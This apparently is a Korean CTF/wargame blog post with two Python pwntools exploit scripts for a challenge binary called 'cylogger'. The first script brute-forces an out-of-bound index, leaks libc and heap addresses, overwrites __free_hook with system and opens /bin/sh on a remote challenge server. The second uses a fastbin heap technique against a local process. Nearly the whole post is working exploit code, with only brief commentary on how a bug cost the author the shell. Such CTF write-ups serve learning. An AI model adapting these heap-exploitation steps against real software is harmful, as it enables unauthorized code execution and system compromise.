

Security/Pwnable

WHL_Cykor - Cylogger

Cdor1 2017. 8. 30. 01:39

서브 취약점(OOB, Out-Of-Bound)을 브루트포스해서 풀었지만, 실수로 쉘을 날려보낸 슬픈 스토리가 있는 익스코드이다.


from pwn import *
#s = process('./cylogger', env={'LD_PRELOAD':'./libc.so.6'})

while True:
	# Retry loop: every exception raised inside the try (timeouts, parse
	# mismatches, the NameError on the `p.recv()` lines) is swallowed and a
	# fresh connection is opened on the next pass.
	try:
		s = remote('10.10.200.203', 10002)
		# Menu helpers. The prompt strings ('>> ', 'Index >> ', ...) are the
		# challenge binary's own output; the single letter is the menu choice.
		def Leave(select, size, data):
			# [L]eave log: log type `select`; type 1 is additionally asked for a size.
			s.recvuntil('>> ')
			s.sendline('L')
			s.recvuntil('>> ')
			s.sendline(str(select))
			if(select == 1):
				s.recvuntil('Size of Log >>')
				s.sendline(str(size))
			s.sendline(data)

		def See(index):
			# [S]ee my log at `index`.
			s.recvuntil('>> ')
			s.sendline('S')
			s.recvuntil('Index >> ')
			s.sendline(str(index))

		def Remove(index):
			# [R]emove my log at `index`.
			s.recvuntil('>> ')
			s.sendline('R')
			s.recvuntil('Index >> ')
			s.sendline(str(index))

		def reseT():
			# rese[T] my log.
			s.recvuntil('>> ')
			s.sendline('T')

		def Change(index, data):
			# [C]hange my log at `index` to `data` (sent with a trailing newline).
			s.recvuntil('>> ')
			s.sendline('C')
			s.recvuntil('Index >> ')
			s.sendline(str(index))
			s.sendline(data)

		def All():
			# [A]ll log: dump every log.
			s.recvuntil('>> ')
			s.sendline('A')

		# Login prompt.
		print s.recvuntil('Ur Name? >>')
		s.sendline('cdor1')
		# Three type-1 logs of size 1024, drop the first two, write one more,
		# then view index 1.
		Leave(1, 1024, 'aaaa')
		Leave(1, 1024, 'bbbb')
		Leave(1, 1024, 'cccc')
		Remove(0)
		Remove(1)
		Leave(1, 1024, 'bbbbbbbb')
		See(1)
		s.recvuntil('bbbbbbbb\n')
		# Rebuild a 6-byte value from the 5 bytes printed after the log text;
		# the script supplies the assumed low byte 0x68 itself.
		leak = u64(('\x68' + s.recv(5)).ljust(8, '\x00'))
		# Hard-coded offsets; presumably tied to the libc.so.6 named on the
		# commented-out LD_PRELOAD line -- they will not match another build.
		base = leak - 0x3c2068
		system = base + 0x456a0
		free_hook = base + 0x3c3788
		log.info('leak : ' + hex(leak))
		log.info('base : ' + hex(base))
		log.info('system : ' + hex(system))
		log.info('free_hook : ' + hex(free_hook))
		# Overwrite log 1 with 16 bytes, view it, and read the 5 bytes that
		# follow (assumed low byte 0x00) as a heap-derived value.
		Change(1, 'b'*16)
		See(1)
		s.recvuntil('Log : bbbbbbbbbbbbbbbb\n')
		heap_leak = u64(('\x00' + s.recv(5)).ljust(8, '\x00'))
		log.info('heap_leak : ' + hex(heap_leak))
		Remove(1)
		Remove(2)

		# 1016-byte payload (8 + 16 + 8 + 8 + 8 + 8 + 120*8); sendline adds one
		# newline, so it stays within the 1024-byte log size requested below.
		payload = p64(heap_leak + 0x28)
		payload += p64(0)*2
		payload += p64(heap_leak + 0x28 + 8)
		payload += p64(1)
		payload += p64(free_hook)
		payload += p64(0x64)
		payload += p64(heap_leak + 0x28 + 8) * 120

		Leave(1, 1024, payload)
		# 100 further logs of 127 identical 8-byte values (1016 bytes each).
		for i in range(0, 100):
			Leave(1, 1024, p64(heap_leak + 0x28 + 8) * 127)
		reseT()

		# Same values logged again (harmless duplicate of the block above).
		log.info('leak : ' + hex(leak))
		log.info('base : ' + hex(base))
		log.info('system : ' + hex(system))
		log.info('free_hook : ' + hex(free_hook))
		log.info('heap_leak : ' + hex(heap_leak))
		#raw_input()
		# Index far beyond the logs created above -- the out-of-bound access the
		# post text refers to (the exact index was brute-forced per the post).
		Change(606858, p64(system))
		Leave(1, 100, '/bin/sh\x00')
		Remove(0)

		s.sendline("ls")
		# BUG: `p` is never defined in this script (the connection is `s`), so
		# this line raises NameError; the except below swallows it and finally
		# closes the connection -- the "lost shell" the post mentions.
		print p.recv()
		s.sendline("./flag_x")
		print p.recv()
		s.interactive()
	except Exception as e:
		# Best-effort retry: any failure restarts the loop with a new connection.
		pass
	finally:
		# NOTE(review): if remote() itself fails on the very first iteration,
		# `s` is unbound here and this NameError is not caught by the loop.
		s.close()

원래 취약점을 이용한 익스코드 (by Demon-이진우)


from pwn import *
# Local run with the bundled libc preloaded so the hard-coded constants below
# match that build; the remote line is kept for the live target.
s = process('./cylogger', env={'LD_PRELOAD':'./libc.so.6'})
#s = remote('10.10.200.203', 10002)

# login: answer the name prompt
name = 'qwer'
s.recvuntil('>>')
s.sendline(name)

def go(n):
    """Pick menu entry *n* by sending its letter once the prompt appears.

    Index 0 is unused; 1..7 map to L/S/R/T/C/A/E (Leave, See, Remove,
    reseT, Change, All, and presumably Exit).
    """
    menu = (0, 'L', 'S', 'R', 'T', 'C', 'A', 'E')
    letter = menu[n]
    # Skip the tail of the menu text ("...xit") and then the '>>' prompt.
    s.recvuntil('xit')
    s.recvuntil('>>')
    s.sendline(letter)

def make(t, m, sz=None):
    """[L]eave a log of type *t* with contents *m*.

    Type 2 takes the data straight away; any other type is first asked
    for a size, answered with *sz*. *m* goes out via send(), so no
    newline is appended.
    """
    go(1)
    s.recvuntil('>>')
    s.sendline(str(t))
    if t != 2:
        # The size prompt only shows up for non-type-2 logs.
        s.recvuntil('ize of Log >>')
        s.sendline(str(sz))
    s.send(m)

def rm(t):
    """[R]emove the log stored at index *t*."""
    index = str(t)
    go(3)
    s.recvuntil('Index >>')
    s.sendline(index)

def se(t, tt):
    """[C]hange the log at index *t*; the new contents *tt* are sent raw (no newline)."""
    index = str(t)
    go(5)
    s.recvuntil('Index >>')
    s.sendline(index)
    s.send(tt)

# Three type-1 logs of 256 bytes each.
for i in range(3):
    make(1,'a',256)

# Drop index 2 and re-create it, then dump all logs.
rm(2)
make(1,'a',256)
go(6)
# In the '[2' entry, whatever follows the single 'a' is read up to end of
# line, prefixed with a 0x00 byte and padded to 8 bytes; the 2816 offset is
# tied to the preloaded libc build.
s.recvuntil('[2')
s.recvuntil('Log : a')
lbc = u64('\x00'+s.recvline().replace('\n','').ljust(7,'\x00'))-2816
# Remove all four logs, then write one type-2 log and dump again.
rm(3);rm(2);rm(1);rm(0)
make(2,'A')
go(6)
# Same reassembly for the bytes following '[0] Log : A' (heap-derived value).
s.recvuntil('[0] Log : A')
hp = u64('\x00'+s.recvline().replace('\n','').ljust(7,'\x00'))
rm(0)
# Two 256-byte type-1 logs: 240 x 'A', 8 zero bytes, 0x30, 7 zero bytes.
for i in range(2):
    make(1,'A'*240+'\x00'*8+'\x30'+'\x00'*7,256)
rm(1);rm(0)
# Manual pause (presumably to inspect the process in a debugger), then print
# both values.
raw_input()
print '0x%x'%lbc
print '0x%x'%hp


# Menu reference (no-op string expression, kept for readability).
'''1. [L]eave log
2. [S]ee my log
3. [R]emove my log
4. rese[T] my log
5. [C]hange my log
6. [A]ll log'''

# Four type-2 logs, remove the first, then rese[T].
# go(4)
make(2,'qwer')
make(2,'asdaf')
make(2,'zxcv')
make(2,'1234')
#make(2,'5678')
rm(0)
raw_input('1')
go(4)
raw_input('2')
# 20-byte type-2 log, then a 23-byte one (three p64(0x30) minus the last byte).
make(2,'1'*20)
make(2,(p64(0x30)*3)[:-1])
raw_input('3')
#make(3,'3'*20)
# 40-byte type-1 log with size 80, then remove indices 3, 1, 0.
make(1,'A'*40,80)
rm(3)
rm(1)
rm(0)

# 22-byte type-1 log (p64 + 14-char tag) with size 40.
make(1,p64(hp+0x380)+'FASTBINCONTROL',40)
raw_input('4')
rm(1)
raw_input('5')
make(2,'tmp')
raw_input('6')
#make(2,'BOOMB')
# Constructed record: 8 x 'A', p32(1), p32(0), p64(lbc+2800), p32(8).
make(2,'A'*8+p32(1)+p32(0)+p64(lbc+2800)+p32(8)) #make fake
# Change log 0 to an 8-byte value derived from lbc.
se(0,p64(lbc-2947503))

s.interactive()

